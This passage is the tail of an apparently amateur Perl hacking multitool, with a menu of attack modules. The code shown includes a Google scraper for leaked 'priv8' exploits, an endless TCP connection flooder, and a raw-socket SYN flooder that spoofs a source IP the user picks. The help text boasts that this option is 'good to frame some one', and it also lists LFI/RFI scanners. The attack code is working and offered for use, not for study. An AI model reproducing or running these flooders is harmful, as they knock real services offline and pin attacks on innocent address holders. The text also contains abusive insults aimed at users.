  2836. close(OUT);
  2837.    
  2838.     }
  2839.    
  2840.  
  2841.    
  2842.    
  2843.  
  2844. }
  2845.  
  2846.  
  2847. if($se == "5"){
  2848. print "\n check the file googler.html wend the scan ends\n";
  2849. print color ("green"),"\n\n>Search for:\n",color("reset");
  2850. my $form = <STDIN>; chomp $form;
  2851.  
  2852. print color ("green"),"\n>What proxy do you want to use: example 200.1.2.0:8080 \n";
  2853. print color ("red"),">If you do not want proxy to put: 0 \n",color ("reset");
  2854.  
  2855. my $proxy = <STDIN>; chomp $proxy;
  2856. my $cont=0;
  2857. my $cont2=0;
  2858. my $ua = new LWP::UserAgent;
  2859.  
  2860. $ua->agent('Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.12) Gecko/20080301 Firefox/2.0.0.12');
  2861. if($proxy!=0) {$ua->env_proxy();
  2862. $ua->proxy("http", "http://$proxy/"); }
  2863.  
  2864. print color ("red"),"\n>Starting Search in Google...\n",color ("reset");
  2865.  
  2866. for(my $i=10;$i<200;$i+=2) {
  2867. my $pedido1 = new HTTP::Request GET =>"http://www.google.pl/search?hl=&q=$form&start=$i";
  2868. my $resposta1 = $ua->request($pedido1) or die ">Error site scanner\n";
  2869. my $res1 = $resposta1->content;
  2870.  
  2871. open (OUT, ">>googler.html");
  2872. print OUT "$res1\n";
  2873. close(OUT);
  2874.  
  2875. $cont=$cont+1;
  2876.  
  2877. while($res1 =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  2878. if ($1 !~ /64\..*\|\.google.*|\.orkut|.*\.google.*|\.youtube.*/){
  2879. my $links=$1; print "$links\n" ; open (OUT, ">>googlerlinks.txt");
  2880. #filetxt();
  2881. print OUT "$links\n";
  2882.  
  2883. close(OUT); $cont2=$cont2+1; }} }
  2884. print color ("green"),"It was picked up $cont2 links and $cont pages by the  Googler are in Googlerlinks.txt\n"; exit;
  2885. }
  2886. if($se == "6"){
  2887. print color ("red"),"\n Make sure To check the File exploits.html\n",color ("reset");
  2888. print "\n Example pl c php \n";
  2889. print "\n\n>File Extension:\n";
  2890. my $form = <STDIN>;
  2891. chomp $form;
  2892.  
  2893. print color ("green"),"\n>What proxy do you want to use: example 200.1.2.0:8080 \n";
  2894. print color  ("red"),">If you do not want proxy to put: 0 \n",color ("reset");
  2895.  
  2896. my $proxy = <STDIN>; chomp $proxy;
  2897. my $cont=0;
  2898. my $cont2=0;
  2899. my $ua = new LWP::UserAgent;
  2900.  
  2901. $ua->agent('Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.12) Gecko/20080301 Firefox/2.0.0.12');
  2902. if($proxy!=0) {$ua->env_proxy();
  2903. $ua->proxy("http", "http://$proxy/"); }
  2904.  
  2905. print color ("red"),"\n>Starting Search in Google...\n",color ("reset");
  2906.  
  2907. for(my $i=10;$i<200;$i+=2) {
  2908. my $pedido1 = new HTTP::Request GET =>"http://www.google.pl/search?hl=&q=intext:PRIV8 AND filetype:$form&start=$i";
  2909. my $resposta1 = $ua->request($pedido1) or die ">Error site scanner\n";
  2910. my $res1 = $resposta1->content;
  2911.  
  2912. open (OUT, ">>exploits.html");
  2913. print OUT "$res1\n";
  2914. close(OUT);
  2915.  
  2916. $cont=$cont+1;
  2917.  
  2918. while($res1 =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  2919. if ($1 !~ /64\..*\|\.google.*|\.orkut|.*\.google.*|\.youtube.*/){
  2920. my $links=$1; print "$links\n" ; open (OUT, ">>exploitslinks.txt");
  2921. #filetxt();
  2922. print OUT "$links\n";
  2923.  
  2924. close(OUT); $cont2=$cont2+1; }} }
  2925. print color ("green"),"It was picked up $cont2 links and $cont pages by the HAT Googler are in links.txt\n",color ("reset"); exit;
  2926. }
  2927.  
  2928. if($se == "3"){
  2929. print color ("red"),"Ip:\n",color("reset");
  2930. $target=<stdin>;
  2931. chop($target);
  2932. print color("red"),"Port:\n",color("reset");
  2933. $porta=<stdin>;
  2934. chop($porta);
  2935. $sockets = new IO::Socket::INET;
  2936. while(1){
  2937. $sockets -> new (PeerAddr => $target,
  2938. PeerPort => $porta,
  2939. Proto => 'tcp',
  2940.  
  2941.                       );
  2942.                         print color ("red"), "[+]",color ("reset"),"Sending Sockets to $target hiting port $porta\n";
  2943.                        
  2944.                         }
  2945.                        
  2946.  
  2947. }
  2948.  
  2949. if($se == "8"){  
  2950. print color ("green"),"use a valide ip ok\n";
  2951. print "and make sure the target port is open\n",color("reset");
  2952. print color ("red"),"Spoof this IP\n",color("reset");
  2953. $src=<stdin>;
  2954. chop ($src);
  2955. print color ("red"), "Target-ip\n",color ("reset");
  2956. $dst=<stdin>;
  2957. chop ($dst);
  2958. print color ("red"),"target port\n",color ("reset");
  2959. $port=<stdin>;
  2960. chop ($port);
  2961.  $Vampire = new Net::RawIP;
  2962.  while(1) {
  2963.          my $src_port = int(rand(65534)+1);
  2964.          my $size = 60000;
  2965.      $Vampire->set({
  2966.                   ip =>
  2967.                     {
  2968.                       saddr => $src,
  2969.                       daddr => $dst
  2970.                     },
  2971.                     tcp =>
  2972.                     {
  2973.                      source => $src_port,
  2974.                      data => $size,
  2975.                      dest => $port,
  2976.                      syn => 1
  2977.                     }
  2978.                 });
  2979.         print color ("red"), "[+]",color ("reset"),"Flooding $dst:$port spoofing-ip $src:$src_port\n",color ("reset");
  2980.         $Vampire->send;
  2981.    
  2982.  
  2983.      }
  2984. }
  2985. if ($se == "9") {
  2986.         print color("reset"),q{
  2987.            
  2988. # 1|Portscanner IO::Socket::INET portscanner small port scanner
  2989. thats tells you each port is open on the target "dont spoofs your ip"  
  2990. -------------------------------------------------------------------------------------------------------------------------                
  2991. # 2|LFI scanner Small LFI It Will Tell you if the WEB Server as some  Vuls on it
  2992. -------------------------------------------------------------------------------------------------------------------------                                      
  2993. # 3|Basic DOS Agent Synflooder IO::Socket::INET flooder built to be fast dont spoofs your ip so dont use it as a fool ok
  2994. -------------------------------------------------------------------------------------------------------------------------                  
  2995. # 4|RFI Scanner :Searchs for Vulnerabilities on web sites
  2996. -------------------------------------------------------------------------------------------------------------------------                                                            
  2997. # 5|googler as the name Says this is a search engine that searchs for a string and stores the results on an html file
  2998. -------------------------------------------------------------------------------------------------------------------------
  2999. # 6|Exploit hunter a babe that huntes for file extensions on the Web you can easly catch a Exploiter
  3000. using is own machine as a web server to show
  3001. his priv8 exploits "it stores the results on a HTML file
  3002. -------------------------------------------------------------------------------------------------------------------------------------------
  3003. # 7|synflooder Net::RawIP Synflooder this tool spoofs your ip it generates is onw IP's so the attack will look like a zomie network attack
  3004. --------------------------------------------------------------------------------------------------------------------------------------------
  3005. # 8|synflloder   Same as number 7 but instead of Generating the fake ips gives you the option to chose an ip to spoof good to frame some one          
  3006. -----------------------------------------------------------------
  3007. -------------------------------r00t------------------------------    
  3008.    
  3009.    };}
  3010.        
  3011.         if ($se =~'help') {
  3012.         print color("reset"),q{
  3013.            
  3014. # 1|Portscanner IO::Socket::INET portscanner small port scanner
  3015. thats tells you each port is open on the target "dont spoofs your ip"  
  3016. -------------------------------------------------------------------------------------------------------------------------                
  3017. # 2|LFI scanner Small LFI It Will Tell you if the WEB Server as some  Vuls on it
  3018. -------------------------------------------------------------------------------------------------------------------------                                      
  3019. # 3|Basic DOS Agent Synflooder IO::Socket::INET flooder built to be fast dont spoofs your ip so dont use it as a fool ok
  3020. -------------------------------------------------------------------------------------------------------------------------                  
  3021. # 4|RFI Scanner :Searchs for Vulnerabilities on web sites
  3022. -------------------------------------------------------------------------------------------------------------------------                                                            
  3023. # 5|googler as the name Says this is a search engine that searchs for a string and stores the results on an html file
  3024. -------------------------------------------------------------------------------------------------------------------------
  3025. # 6|Exploit hunter a babie that huntes for file extensions on the Web you can easly catch an Exploiter
  3026. using is own machine as a web server to show
  3027. his priv8 exploits "it stores the results on a HTML file
  3028. -------------------------------------------------------------------------------------------------------------------------------------------
  3029. # 7|synflooder Net::RawIP Synflooder this tool spoofs your ip it generates is onw IP's so the attack will look like a zomie network attack
  3030. --------------------------------------------------------------------------------------------------------------------------------------------
  3031. # 8|synflloder   Same as number 7 but instead of Generating the fake ips gives you the option to chose an ip to spoof good to frame some one          
  3032. -----------------------------------------------------------------
  3033.                           fuck my english ok
  3034.                            i know it sucks
  3035. -------------------------------r00t------------------------------    
  3036.    
  3037.     };}
  3038.        
  3039. else { print color("reset"),"are you retarded or something??\n";}